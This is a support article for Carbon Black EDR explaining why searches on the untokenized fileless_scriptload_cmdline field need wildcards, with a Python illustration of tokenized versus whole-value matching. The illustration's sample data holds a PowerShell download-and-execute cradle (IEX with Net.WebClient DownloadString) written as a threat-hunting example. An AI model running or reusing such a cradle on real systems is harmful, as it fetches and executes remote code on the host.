EDR: Fileless_Scriptload_Cmdline Searches not Working as Expected
Article ID: 288273
Products
Carbon Black EDR (formerly Cb Response)
Issue/Introduction
Example:
Searching the fileless_scriptload_cmdline field for a bare term does not behave like a search on other command-line fields. The following query returns no results, even when fileless PowerShell script loads containing Net.WebClient are present in the data:
fileless_scriptload_cmdline:Net.WebClient
Wrapping the term in wildcards returns the expected results:
fileless_scriptload_cmdline:*Net.WebClient*
NOTE:
The working query begins with a wildcard, so it is rejected while the option "Block Searches with Leading Wildcards" is enabled. To run it, disable that option under Settings -> Advanced Settings. Leading-wildcard searches are expensive on large datasets; re-enable the option once the search is complete if it was turned on for performance reasons.
Cause
The fileless_scriptload_cmdline field is not tokenized. A query term is compared against the whole stored value rather than against individual words, so a bare term only matches when the entire command line equals that term. Wildcards on both sides are required to match a substring anywhere in the command line.
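The following Python script is an added illustration of the cause described above; it is not Carbon Black code and does not talk to an EDR server. It models a tokenized field against an untokenized one with the same Solr-style wildcard syntax, shows why the bare term misses and the wildcard term hits, and builds the process-search request while applying the same leading-wildcard check the server setting enforces. The tokenizer (split on whitespace and a few delimiters), the sample command line, the host name and the assumption that the server exposes the Cb Response REST API's /api/v1/process endpoint with a q parameter are all constructed for this example; verify the endpoint against your server's API documentation.

```python
import re
from urllib.parse import urlencode

# Constructed sample value for fileless_scriptload_cmdline (not real telemetry):
# a typical download-cradle command line that an analyst would hunt for.
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -c "
    "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
)

# Simplified tokenizer (an assumption for this illustration): split on whitespace
# and a few shell/PowerShell delimiters. Real EDR/Solr analyzers differ in detail.
_DELIMS = re.compile(r"""[\s()'";,=]+""")


def tokenize(value):
    """Break a command line into the tokens an analysed field would index."""
    return [tok for tok in _DELIMS.split(value) if tok]


def _wildcard_regex(term):
    """Translate a Solr-style term (* = any run, ? = one char) into a regex
    anchored to the full string being tested."""
    parts = []
    for ch in term:
        if ch == "*":
            parts.append(".*")
        elif ch == "?":
            parts.append(".")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$")


def term_matches(field_value, term, tokenized):
    """Does a field:term query hit this document?

    tokenized=True  -> the term must match at least one indexed token
                       (how most command-line fields behave).
    tokenized=False -> the term must match the entire stored value
                       (how fileless_scriptload_cmdline behaves before 7.7.0).
    Case folding depends on the server schema and is not modelled here.
    """
    pattern = _wildcard_regex(term)
    if tokenized:
        return any(pattern.match(tok) for tok in tokenize(field_value))
    return pattern.match(field_value) is not None


def build_process_search_url(base_url, field, term, block_leading_wildcards=True):
    """Build the process-search request for a field:term query.

    Assumes the Cb Response REST API's /api/v1/process endpoint with a `q`
    parameter (check your server's API docs). Applies the same rule as the
    "Block Searches with Leading Wildcards" setting so a blocked query is
    caught before it is sent.
    """
    if block_leading_wildcards and term[:1] in ("*", "?"):
        raise ValueError(
            "query starts with a wildcard; disable 'Block Searches with Leading "
            "Wildcards' under Settings -> Advanced Settings or rewrite the query"
        )
    query = urlencode({"q": f"{field}:{term}", "rows": 10})
    return f"{base_url.rstrip('/')}/api/v1/process?{query}"


def demo():
    """Reproduce the article: bare term misses, wildcard term hits."""
    field = "fileless_scriptload_cmdline"
    return {
        "bare_term_untokenized": term_matches(SAMPLE_CMDLINE, "Net.WebClient", tokenized=False),
        "bare_term_tokenized": term_matches(SAMPLE_CMDLINE, "Net.WebClient", tokenized=True),
        "wildcard_untokenized": term_matches(SAMPLE_CMDLINE, "*Net.WebClient*", tokenized=False),
        "url_with_block_disabled": build_process_search_url(
            "https://edr.example.internal", field, "*Net.WebClient*",
            block_leading_wildcards=False),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the script shows the bare term matching only when the field is treated as tokenized, the wildcard term matching the untokenized field, and the request builder refusing the leading-wildcard query until the block is lifted.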
Resolution
This issue is resolved in EDR Server build 7.7.0. On earlier builds, use the wildcard query shown above.